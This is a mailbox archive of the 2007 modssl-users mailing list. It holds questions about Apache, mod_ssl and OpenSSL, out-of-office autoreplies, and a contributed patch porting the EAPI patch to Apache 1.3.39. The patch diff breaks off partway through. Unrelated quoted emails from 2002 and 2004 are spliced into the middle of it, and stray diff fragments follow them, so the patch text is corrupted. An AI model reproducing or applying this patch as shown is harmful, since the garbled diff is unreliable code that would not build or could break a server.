	by linuxap01e.dmc.de with esmtp (Exim 4.63)
	(envelope-from )
	id 1ISwke-0005jc-E0
	for modssl-users@modssl.org; Wed, 05 Sep 2007 17:25:08 +0200
X-Virus-Scanned: amavisd-new at dmc.de
Received: from linuxap01e.dmc.de ([127.0.0.1])
	by localhost (linux-ap01e.dmc.de [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id Y9Rp2co5Kuxe for ;
	Wed,  5 Sep 2007 17:25:04 +0200 (CEST)
Received: from [193.110.102.2] (helo=dmc-l01-mx01.dmc.local)
	by linuxap01e.dmc.de with esmtp (Exim 4.63)
	(envelope-from )
	id 1ISwka-0005jK-T2
	for modssl-users@modssl.org; Wed, 05 Sep 2007 17:25:04 +0200
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: POST data lost
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Wed, 5 Sep 2007 17:25:03 +0200
Message-ID: <1AEDE16DC366BA49AC76CCC02562DAD00844E5@dmc-l01-mx01.dmc.local>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: POST data lost
Thread-Index: Acfv0PZNSB2XUnthSE+LZJIAcHq/8Q==
From: =?iso-8859-1?Q?Michael_B=F6ckling?= 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Michael_B=F6ckling?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi folks!

When I have a form on a http page with a https target (and vice versa), =
the POST data is lost as soon as the switch to SSL (or non-SSL) is made. =
It works when I use GET (not surprisingly).

I use Apache 2.2 with mod_jk and mod_ssl that is connected to several =
5.5.23 Tomcats.
The switch to HTTPS happens automatically using RewriteCond and =
RewriteRule.

I don't know what to do, I can't preserve the POST data. Any ideas?

Regards,


Michael


--=20
Michael B=F6ckling
Java Engineer
dmc digital media center GmbH=20
Rommelstra=DFe 11=20
70376 Stuttgart (Germany)=20
Telefon: +49 711 601747-0
Telefax: +49 711 601747-141=20
E-Mail: Michael.Boeckling@dmc.de=20
Internet: www.dmc.de=20

Handelsregister: AG Stuttgart HRB 18974
Gesch=E4ftsf=FChrer: Andreas Magg, Daniel Rebhorn, Andreas Schwend

---------------------------------------------
"Open Source ist reif f=FCr ECM" zeigt Ihnen neue und innovative =
L=F6sungswege sowie Best Practices aus dem Bereich Enterprise Content =
Management. Besuchen Sie die ECM-Vortragsreihe bei dmc!

N=E4chste Veranstaltung:
20. September 2007, 15-18.30 Uhr: "Digitaler Rechnungsein- und ausgang. =
Was ist m=F6glich? Was ist erlaubt? - Automatische Verarbeitung des =
Rechnungseingangs und digitale Signierung von Dokumenten beim Versand =
von elektronischen Dokumenten."
Veranstaltungsort: R=F6merkastell, 70376 Stuttgart=20

Melden Sie sich unter www.dmc.de/ecm an oder besuchen Sie uns vom =
25.-27.09.07 auf der DMS in K=F6ln: Halle 7, Stand G095!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 10 14:44:08 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3506A14D884; Mon, 10 Sep 2007 14:44:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hoboe1bl1.telenet-ops.be (hoboe1bl1.telenet-ops.be [195.130.137.72])
	by master.modssl.org (Postfix) with ESMTP id BC9A314D82E
	for ; Mon, 10 Sep 2007 14:44:07 +0200 (CEST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by hoboe1bl1.telenet-ops.be (Postfix) with SMTP id E5A82D407A
	for ; Mon, 10 Sep 2007 14:43:57 +0200 (CEST)
Received: from [192.168.2.2] (d54C461BD.access.telenet.be [84.196.97.189])
	by hoboe1bl1.telenet-ops.be (Postfix) with ESMTP id C83E0D4076
	for ; Mon, 10 Sep 2007 14:43:57 +0200 (CEST)
Message-ID: <46E53BAE.9030907@nobus.be>
Date: Mon, 10 Sep 2007 14:42:22 +0200
From: Pascal Nobus 
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: mod_ssl for apache 1.3.39
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Pascal Nobus 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Does anyone know that a new version of mod_ssl is under construction for
use with apache 1.3.39?
I tried to compile Apache-1.3.39 with mod_ssl for 1.3.37 but that kills
apache...

best regards,
Pascal
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 10 15:01:48 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9BB6914D88A; Mon, 10 Sep 2007 15:01:48 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from email01.consolidated.net (email01.consolidated.net [216.176.95.171])
	by master.modssl.org (Postfix) with ESMTP id D997A14D82E
	for ; Mon, 10 Sep 2007 15:01:46 +0200 (CEST)
Received: from email2.consolidated.com (EHLO mtnsmtp02.consolidated.com) ([216.176.95.7])
	by email01.consolidated.net (MOS 3.8.3-GA FastPath queued)
	with ESMTP id BFN83196;
	Mon, 10 Sep 2007 08:01:07 -0500 (CDT)
Received: from mtnmail01.CONSOLIDATED.COM ([10.1.253.132])
          by mtnsmtp02.consolidated.com (Lotus Domino Release 7.0.1 HF638)
          with ESMTP id 2007091008010623-145175 ;
          Mon, 10 Sep 2007 08:01:06 -0500 
Subject: Christa A. Packer/consolidated is out of the office. 
From: Christa.Packer@consolidated.com
To: modssl-users@modssl.org
Message-ID: 
Date: Mon, 10 Sep 2007 08:01:05 -0500
MIME-Version: 1.0
X-MIMETrack: Serialize by Router on mtnmail01/consolidated(Release 7.0.1 HF638|July 30, 2007) at
 09/10/2007 08:01:06 AM,
	Itemize by SMTP Server on mtnsmtp02/consolidated(Release 7.0.1 HF638|July
 30, 2007) at 09/10/2007 08:01:06 AM,
	Serialize by Router on mtnsmtp02/consolidated(Release 7.0.1 HF638|July 30, 2007) at
 09/10/2007 08:01:07 AM,
	Serialize complete at 09/10/2007 08:01:07 AM
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christa.Packer@consolidated.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting  09/07/2007 and will not return until
09/17/2007.

I will be out of the office for the next few days.  I will get back to you
when I return

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 10 15:08:44 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 07A5814D884; Mon, 10 Sep 2007 15:08:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from jaguNET.com (devsys.jaguNET.com [209.133.192.6])
	by master.modssl.org (Postfix) with ESMTP id B89E014D82E
	for ; Mon, 10 Sep 2007 15:08:40 +0200 (CEST)
Received: from jaguNET.com (localhost [127.0.0.1])
	by devsys.jaguNET.com (8.13.8/8.13.6) with ESMTP id l8AD8KaV097726
	for ; Mon, 10 Sep 2007 09:08:20 -0400 (EDT)
	(envelope-from jim@jaguNET.com)
Received: (from jim@localhost)
	by devsys.jaguNET.com (8.13.6/8.13.6/Submit) id l8AD8KvB097725
	for modssl-users@modssl.org; Mon, 10 Sep 2007 09:08:20 -0400 (EDT)
	(envelope-from jim)
From: Jim Jagielski 
Message-Id: <200709101308.l8AD8KvB097725@devsys.jaguNET.com>
Subject: Re: mod_ssl for apache 1.3.39
To: modssl-users@modssl.org
Date: Mon, 10 Sep 2007 09:08:20 -0400 (EDT)
In-Reply-To: <46E53BAE.9030907@nobus.be>
X-Mailer: ELM [version 2.5 PL8]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jim Jagielski 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Some of the patches in eapi.patch do not apply cleanly and are
rejected. This means that, unless you hand apply them, the
patch isn't complete and you core dump when mod_ssl is trying
to hook.

Pascal Nobus wrote:
> 
> Does anyone know that a new version of mod_ssl is under construction for
> use with apache 1.3.39?
> I tried to compile Apache-1.3.39 with mod_ssl for 1.3.37 but that kills
> apache...
> 
> best regards,
> Pascal
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


-- 
===========================================================================
   Jim Jagielski   [|]   jim@jaguNET.com   [|]   http://www.jaguNET.com/
	    "If you can dodge a wrench, you can dodge a ball."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 10 21:31:23 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0F3E514D88A; Mon, 10 Sep 2007 21:31:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.fidoki.com (dsl017-059-027.wdc2.dsl.speakeasy.net [69.17.59.27])
	by master.modssl.org (Postfix) with ESMTP id 3613414D82E
	for ; Mon, 10 Sep 2007 21:31:21 +0200 (CEST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by liet.fidoki.com (Postfix) with ESMTP id 222238B77E
	for ; Mon, 10 Sep 2007 15:31:10 -0400 (EDT)
Received: from mail.fidoki.com ([127.0.0.1])
 by localhost (liet.fidoki.com [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 19699-08 for ;
 Mon, 10 Sep 2007 15:31:08 -0400 (EDT)
Received: from dfischer-dt-osx.grantstreet.com (natpool01.grantstreet.com [66.179.16.41])
	(using TLSv1 with cipher RC4-MD5 (128/128 bits))
	(No client certificate requested)
	by liet.fidoki.com (Postfix) with ESMTP id 9AB218B778
	for ; Mon, 10 Sep 2007 15:31:08 -0400 (EDT)
Message-ID: <46E59B7C.10508@fidoki.com>
Date: Mon, 10 Sep 2007 15:31:08 -0400
From: "Douglas K. Fischer" 
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070728 Thunderbird/2.0.0.6 Mnenhy/0.7.5.666
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: mod_ssl for apache 1.3.39
Content-Type: multipart/mixed;
 boundary="------------080207030205060002070408"
X-Virus-Scanned: by amavisd-new at fidoki.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Douglas K. Fischer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------080207030205060002070408
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

I patched the EAPI patch to apply cleanly to 1.3.39. This should work
until a version is rolled for 1.3.39.

Cheers,

Doug

--------------080207030205060002070408
Content-Type: text/plain; x-mac-type="0"; x-mac-creator="0";
 name="mod_ssl-2.8.28-1.3.39.patch"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="mod_ssl-2.8.28-1.3.39.patch"

diff -PurN mod_ssl-2.8.28-1.3.37/pkg.eapi/eapi.patch mod_ssl-2.8.28-1.3.39/pkg.eapi/eapi.patch
--- mod_ssl-2.8.28-1.3.37/pkg.eapi/eapi.patch	2007-09-10 13:31:38.000000000 -0400
+++ mod_ssl-2.8.28-1.3.39/pkg.eapi/eapi.patch	2007-09-10 13:36:27.000000000 -0400
@@ -1132,7 +1132,7 @@
  
  /*
   * The max child slot ever assigned, preserved across restarts.  Necessary
-@@ -436,6 +439,30 @@
+@@ -471,6 +474,30 @@
      }
  }
  
@@ -1163,7 +1163,7 @@
  #ifndef NETWARE
  static APACHE_TLS int volatile exit_after_unblock = 0;
  #endif
-@@ -1551,6 +1578,9 @@
+@@ -1588,6 +1615,9 @@
  	}
  
  	ap_bsetflag(save_req->connection->client, B_EOUT, 1);
@@ -1173,7 +1173,7 @@
  	ap_bclose(save_req->connection->client);
  	
  	if (!ap_standalone)
-@@ -1559,6 +1589,9 @@
+@@ -1596,6 +1626,9 @@
      }
      else {			/* abort the connection */
  	ap_bsetflag(current_conn->client, B_EOUT, 1);
@@ -1183,7 +1183,7 @@
  	ap_bclose(current_conn->client);
  	current_conn->aborted = 1;
      }
-@@ -1880,10 +1913,16 @@
+@@ -1915,10 +1948,16 @@
      /* Send any leftover data to the client, but never try to again */
  
      if (ap_bflush(r->connection->client) == -1) {
@@ -1200,7 +1200,7 @@
      ap_bsetflag(r->connection->client, B_EOUT, 1);
  
      /* Close our half of the connection --- send the client a FIN */
-@@ -2582,6 +2621,9 @@
+@@ -2617,6 +2656,9 @@
      /* Clear the pool - including any registered cleanups */
      ap_destroy_pool(pglobal);
  #endif
@@ -1210,7 +1210,7 @@
      exit(code);
  }
  
-@@ -3655,6 +3697,24 @@
+@@ -3711,6 +3753,24 @@
      conn->remote_addr = *remaddr;
      conn->remote_ip = ap_pstrdup(conn->pool,
  			      inet_ntoa(conn->remote_addr.sin_addr));
@@ -1235,7 +1235,7 @@
  
      return conn;
  }
-@@ -4165,6 +4225,15 @@
+@@ -4221,6 +4281,15 @@
      printf("Server's Module Magic Number: %u:%u\n",
  	   MODULE_MAGIC_NUMBER_MAJOR, MODULE_MAGIC_NUMBER_MINOR);
      printf("Server compiled with....\n");
@@ -1251,10 +1251,10 @@
  #ifdef TPF
      show_os_specific_compile_settings();
  #endif
-@@ -4339,6 +4408,22 @@
-     ap_server_pre_read_config  = ap_make_array(pcommands, 1, sizeof(char *));
+@@ -4396,6 +4465,22 @@
      ap_server_post_read_config = ap_make_array(pcommands, 1, sizeof(char *));
      ap_server_config_defines   = ap_make_array(pcommands, 1, sizeof(char *));
+     pid_table                  = ap_make_table(pglobal, HARD_SERVER_LIMIT);
 +
 +#ifdef EAPI
 +    ap_hook_init();
@@ -1274,7 +1274,7 @@
  }
  
  #ifndef MULTITHREAD
-@@ -4835,6 +4920,9 @@
+@@ -4892,6 +4977,9 @@
  
  	    ap_sync_scoreboard_image();
  	    if (ap_scoreboard_image->global.running_generation != ap_my_generation) {
@@ -1284,7 +1284,7 @@
  		ap_bclose(conn_io);
  		clean_child_exit(0);
  	    }
-@@ -4863,6 +4951,9 @@
+@@ -4920,6 +5008,9 @@
  	 */
  
  #ifdef NO_LINGCLOSE
@@ -1294,7 +1294,7 @@
  	ap_bclose(conn_io);	/* just close it */
  #else
  	if (r && r->connection
-@@ -4873,6 +4964,9 @@
+@@ -4930,6 +5021,9 @@
  	    lingering_close(r);
  	}
  	else {
@@ -1304,7 +1304,7 @@
  	    ap_bsetflag(conn_io, B_EOUT, 1);
  	    ap_bclose(conn_io);
  	}
-@@ -5656,16 +5750,31 @@
+@@ -5730,16 +5824,31 @@
  	    usage(argv[0]);
  	}
      }
@@ -1336,7 +1336,7 @@
      }
  
      child_timeouts = !ap_standalone || one_process;
-@@ -5813,6 +5922,10 @@
+@@ -5887,6 +5996,10 @@
  	    ap_destroy_pool(r->pool);
  	}
  
@@ -1347,7 +1347,7 @@
  	ap_bclose(cio);
      }
      exit(0);
-@@ -6189,6 +6302,9 @@
+@@ -6263,6 +6376,9 @@
  	ap_kill_cleanups_for_socket(ptrans, csd);
  
  #ifdef NO_LINGCLOSE
@@ -1357,7 +1357,7 @@
  	ap_bclose(conn_io);	/* just close it */
  #else
  	if (r && r->connection
-@@ -6199,6 +6315,9 @@
+@@ -6273,6 +6389,9 @@
  	    lingering_close(r);
  	}
  	else {
@@ -1367,7 +1367,7 @@
  	    ap_bsetflag(conn_io, B_EOUT, 1);
  	    ap_bclose(conn_io);
  	}
-@@ -7774,6 +7893,10 @@
+@@ -7848,6 +7967,10 @@
      if (!conf_specified)
          ap_cpystrn(ap_server_confname, SERVER_CONFIG_FILE, sizeof(ap_server_confname));
  
@@ -1378,7 +1378,7 @@
      if (!ap_os_is_path_absolute(ap_server_confname))
          ap_cpystrn(ap_server_confname,
                     ap_server_root_relative(pcommands, ap_server_confname),
-@@ -7814,6 +7937,9 @@
+@@ -7888,6 +8011,9 @@
  #else /* ndef WIN32 */
      server_conf = ap_read_config(pconf, ptrans, ap_server_confname);
  #endif
@@ -1598,26 +1598,29 @@
 Index: src/modules/standard/mod_status.c
 --- src/modules/standard/mod_status.c	28 Jul 2006 13:55:27 -0000	1.1.1.17
 +++ src/modules/standard/mod_status.c	28 Jul 2006 13:56:29 -0000	1.14
-@@ -652,12 +678,23 @@
+@@ -653,6 +653,18 @@
  			    ap_rprintf(r,
  			     "

  
-----Original Mess 

  
 age-----
From:=20
  owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org]On=20
  Behalf Of Avery, Ken
Sent: 30 January 2004 =
17:02
To:=20
  modssl-users@modssl.org
Subject: There appears to be a major =
memory=20
  leak in mod_ssl/OpenSSL


  
I have been tracking this down for a =
couple of=20
  weeks and thought it was in the code my company is developing and it =
appears=20
  that is not the case. In order to eliminate our code from the mix and =
isolate=20
  the problem here is what I did:

  
This was done on Windows and =
Linux:
1. =
Download the=20
  latest Apache from www.apache.org.
2. =
Download the=20
  latest OpenSSL from www.openssl.org.
3. =
Build them both,=20
  with apache add the mod_ssl option and also for Linux use the MPM =
worker=20
  module.
4. Install and modify the ssl.conf file ServerName =
value.
5. Run =
Apache=20
  (httpd)
6a. Run the Performance monitor on Windows and look at =
Private Bytes=20
  for the second Apache process.
6b. On =
Linux run top=20
  -p pid(httpd1) -p pid(http2) ….. -p pid(httpN) watching the size =
of the=20
  processes
7. Set you browser to not cache requests and check for a new =
page every=20
  time.
8.=20
  Start fetching a page from https://localhost and keep refreshing the page. 
So =
far 3 other=20
  engineers have reproduced this test because they did not believe the =
problem=20
  could be in Apache mod_ssl/OpenSSL, they all verified that it leaks =
like a=20
  sieve.

  
We were all trying to figure out why no =
one else=20
  has complained about such a huge leak so we ran another test. We tried =
using=20
  the prefork MPM and it turns out that worked fine. Based on the =
results it=20
  appears the OS is cleaning up memory for the prefork module and the =
threaded=20
  model never gets its memory freed. I have used a debugger on Windows =
and set=20
  break points on the CRYPTO_malloc and CRYPTO_free functions and have =
seen gobs=20
  of memory CRYPTO_malloc(ed) and not one time have I seen CRYPTO_free =
called. I=20
  was not sure if having the OS cleanup memory was part of the design =
(if indeed=20
  that is what is happening) or if there is potentially a problem in the =
OpenSSL=20
  memory management code.

  
With all this said, I am by no means an =
expert on=20
  this code and could really use some help understanding what is going =
on=20
  here?

  
Any and all help is =
appreciated,
Ken 

  
-----Original Message-----
From: Ramakrishna Kuppa 
  [mailto:ramakrishna@intruvert.com]
Sent: Monday, September 30, 2002 
  5:08 PM
To: 'modssl-users@modssl.org'
Subject: RE: 
  Apache.exe generates errors and is closed by Windows.


  
Chris, 

  
I upgraded our system to use OpenSSL 0.9.6g from your latest 
  build. However, the error I was referring to occurred in the previous build 
  that had version 0.9.6d of OpenSSL.

  
The error is a Dr.Watson error. The usual popup box comes with 
  the above message and until the user acknowledges, the system doesn't service 
  any requests. There aren't any useful messages that get logged 
  either.

  
The complete message is as follows: 
"Apache.exe generates errors and will be closed by Windows. You will 
  need to restart the program. An error log is being 
created."



  
> -----Original Message----- 
> 
  From: hunter [mailto:theantigod@sympatico.ca] 
  
> Sent: Monday, September 30, 2002 4:59 PM 
  
> To: modssl-users@modssl.org 
> 
  Subject: Re: Apache.exe generates errors and is closed by Windows. 
  
> 
> 
> Ramakrishna Kuppa wrote: 
> > I am 
  getting the above error on my Windows platform. The 
> environment 
> > details are as 
  follows: 
> > 
> > 
  OS: Windows 2000 
> > Server: Apache 1.3.26 with 
  OpenSSL 0.9.6d and mod_ssl 2.8.10 
> > 
  
> > The OS pops up a box with the above message 
  and until the user 
> > acknowledges, the system 
  doesn't respond to any user 
> requests. In a way, 
  
> > the system "hangs". 
> > 
> > Any ideas on how this can 
  be resolved? Alternatively, can 
> the server 
  
> > be 
> > made to 
  service user requests? 
> > 
> > Thanks 
> > Ramakrishna 
  
> > 
> 
> Ramakrishna, 
> 
> Could you please explain what is 'the above error'. 
  
> 
> Guess: Are you referring to 
  an abnormal end.. a dialog that says a 
> program is 
  exiting unexpectedly? 
> 
> Warning: You should not be using OpenSSL 0.9.6d - I thought you 
  were 
> using one of the new builds I made? 
  
> 
> Advice: This error might 
  happen if you did not have all of 
> the parts or 
  
> it is misconfigured.  You may find a clue in 
  the error.log.  Have you 
> ever had this 
  working or are you failing on an initial install. 
> 
  
> Chris. 
> 
  
> 
  ______________________________________________________________________ 
  
> Apache Interface to OpenSSL 
  (mod_ssl)                   
  www.modssl.org 
> User Support Mailing 
  List                      
  modssl-users@modssl.org 
> Automated List 
  Manager                            
  majordomo@modssl.org 
> 

??..reading.. 
%s"
-+			     "%s"
-+			     "%s"
-+			     "
%s"
++                "%s"
++                "%s"
++                "
%s%s%s



furyx001@umn.edu 

Sent by: owner-modssl-users@modssl.org

12/19/2007 09:45 AM






Please respond to

modssl-users@modssl.org











To

modssl-users@modssl.org




cc






Subject

mod_ssl-2.8.30-1.3.39 w/ mm-1.4.2 on
mac os 10.4 issues



















Hi, 



I am trying to run Apache 1.3.39 with mod_ssl 2.8.30, openssl 0.9.8g and
mm 1.4.2.  I am able to successfully compile it, but when I start
Apache in SSL mode, it exits immediately.  Looking in the error log,
I see the following message: 



dyld: lazy symbol binding failed: Symbol not found: _SSL_CTX_sess_set_new_cb


 Referenced from: /usr/local/apache-1.3.39/libexec/libssl.so


 Expected in: flat namespace 



Can anyone help me in resolving why this is happening?




Thanks, 

Bob


--=_alternative 006BCEF9862573B7_=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 20 22:57:00 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6976B14D892; Thu, 20 Dec 2007 22:57:00 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from e2.ny.us.ibm.com (e2.ny.us.ibm.com [32.97.182.142])
	by master.modssl.org (Postfix) with ESMTP id AADBD14D840
	for ; Thu, 20 Dec 2007 22:56:59 +0100 (CET)
Received: from d01relay04.pok.ibm.com (d01relay04.pok.ibm.com [9.56.227.236])
	by e2.ny.us.ibm.com (8.13.8/8.13.8) with ESMTP id lBKLukv6003424
	for ; Thu, 20 Dec 2007 16:56:46 -0500
Received: from d01av04.pok.ibm.com (d01av04.pok.ibm.com [9.56.224.64])
	by d01relay04.pok.ibm.com (8.13.8/8.13.8/NCO v8.7) with ESMTP id lBKLuktU105426
	for ; Thu, 20 Dec 2007 16:56:46 -0500
Received: from d01av04.pok.ibm.com (loopback [127.0.0.1])
	by d01av04.pok.ibm.com (8.12.11.20060308/8.13.3) with ESMTP id lBKLuji2018378
	for ; Thu, 20 Dec 2007 16:56:45 -0500
Received: from d01ml392.pok.ibm.com (d01ml392.pok.ibm.com [9.56.228.50])
	by d01av04.pok.ibm.com (8.12.11.20060308/8.12.11) with ESMTP id lBKLujbX018333
	for ; Thu, 20 Dec 2007 16:56:45 -0500
Subject: Jeff Donald is out of the office.
From: Jeff Donald 
To: modssl-users@modssl.org
Message-ID: 
Date: Thu, 20 Dec 2007 16:56:44 -0500
X-MIMETrack: Serialize by Router on D01ML392/01/M/IBM(Release 7.0.2FP2 IGS702FP2HF5|November
 8, 2007) at 12/20/2007 16:56:45
MIME-Version: 1.0
Content-type: multipart/alternative; 
	Boundary="0__=0ABBF924DFEB0A618f9e8a93df938690918c0ABBF924DFEB0A61"
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeff Donald 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0__=0ABBF924DFEB0A618f9e8a93df938690918c0ABBF924DFEB0A61
Content-type: text/plain; charset=US-ASCII


I will be out of the office starting  12/20/2007 and will not return until
01/02/2008.


While I'm away please feel free to contact my manager, Nancy Crooks
(ncrooks@us.ibm.com) at 201 967-6428 for any technical issues related to
ITCAM.

I will respond to your message when I return.

Thank you, and happy holidays!
--0__=0ABBF924DFEB0A618f9e8a93df938690918c0ABBF924DFEB0A61
Content-type: text/html; charset=US-ASCII
Content-Disposition: inline



I will be out of the office starting  12/20/2007 and will not return until 01/02/2008.





While I'm away please feel free to contact my manager, Nancy Crooks (ncrooks@us.ibm.com) at 201 967-6428 for any technical issues related to ITCAM. 



I will respond to your message when I return.



Thank you, and happy holidays!
--0__=0ABBF924DFEB0A618f9e8a93df938690918c0ABBF924DFEB0A61--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 26 16:51:52 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5112E14DA33; Wed, 26 Dec 2007 16:51:52 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from secure.intgrp.com (secure.intgrp.com [66.83.182.2])
	by master.modssl.org (Postfix) with ESMTP id ADC2014D83E
	for ; Wed, 26 Dec 2007 16:51:51 +0100 (CET)
Received: from E510 ([10.0.0.145])
	by secure.intgrp.com (8.14.1/linuxconf) with SMTP id lBQFpYOL015018
	for ; Wed, 26 Dec 2007 10:51:34 -0500
Message-ID: <00b401c847d7$32384b70$9100000a@E510>
From: "Eric Wood" 
To: 
Subject: opensll req -new:  unkown option -new!?
Date: Wed, 26 Dec 2007 10:51:35 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00B1_01C847AD.48F94870"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3198
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Eric Wood" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00B1_01C847AD.48F94870
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

My cert expired so I'm trying to renew.  Because the Organizational Unit =
field is now required, I'm trying to recreate a new CSR from my existing =
key:

# openssl req -new -key www.xyz.com.key -out www.xyz.com.csr
unknown option -new
req [options] outfile
where options  are
........ etc..
-new           new request.
........ etc.


I'm running FC6 with latest openssl-0.9.8b-15.fc6.   I'm totally =
perplexed as to why -new is an unknown option.  Any ideas?

Thanks,   =20
-Eric Wood
------=_NextPart_000_00B1_01C847AD.48F94870
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable











My cert expired so I'm trying to =
renew. =20
Because the Organizational Unit field is now required, I'm trying to =
recreate a=20
new CSR from my existing key:


 


# openssl req =96new =96key www.xyz.com.key =96out www.xyz.com.csr
unknown option =
=96new
req=20
[options] <infile >outfile
where options  are
........=20
etc..


-new          =
 new=20
request.


........ etc.


 


 


I'm running FC6 with latest=20
openssl-0.9.8b-15.fc6.   I'm totally perplexed as to why -new =
is an=20
unknown option.  Any ideas?


 


Thanks,    


-Eric =
Wood


------=_NextPart_000_00B1_01C847AD.48F94870--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 26 17:01:29 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2FC2314DA30; Wed, 26 Dec 2007 17:01:28 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from email02.consolidated.net (email02.consolidated.net [216.176.95.173])
	by master.modssl.org (Postfix) with ESMTP id 0A71A14D83E
	for ; Wed, 26 Dec 2007 17:01:26 +0100 (CET)
Received: from lfknpsmtp01.CONSOLIDATED.COM (email2.consolidated.com [207.70.131.15])
	by email02.consolidated.net (MOS 3.8.3-GA)
	with ESMTP id KUJ26983;
	Wed, 26 Dec 2007 10:01:06 -0600 (CST)
Received: from mtnmail01.CONSOLIDATED.COM ([10.1.250.5])
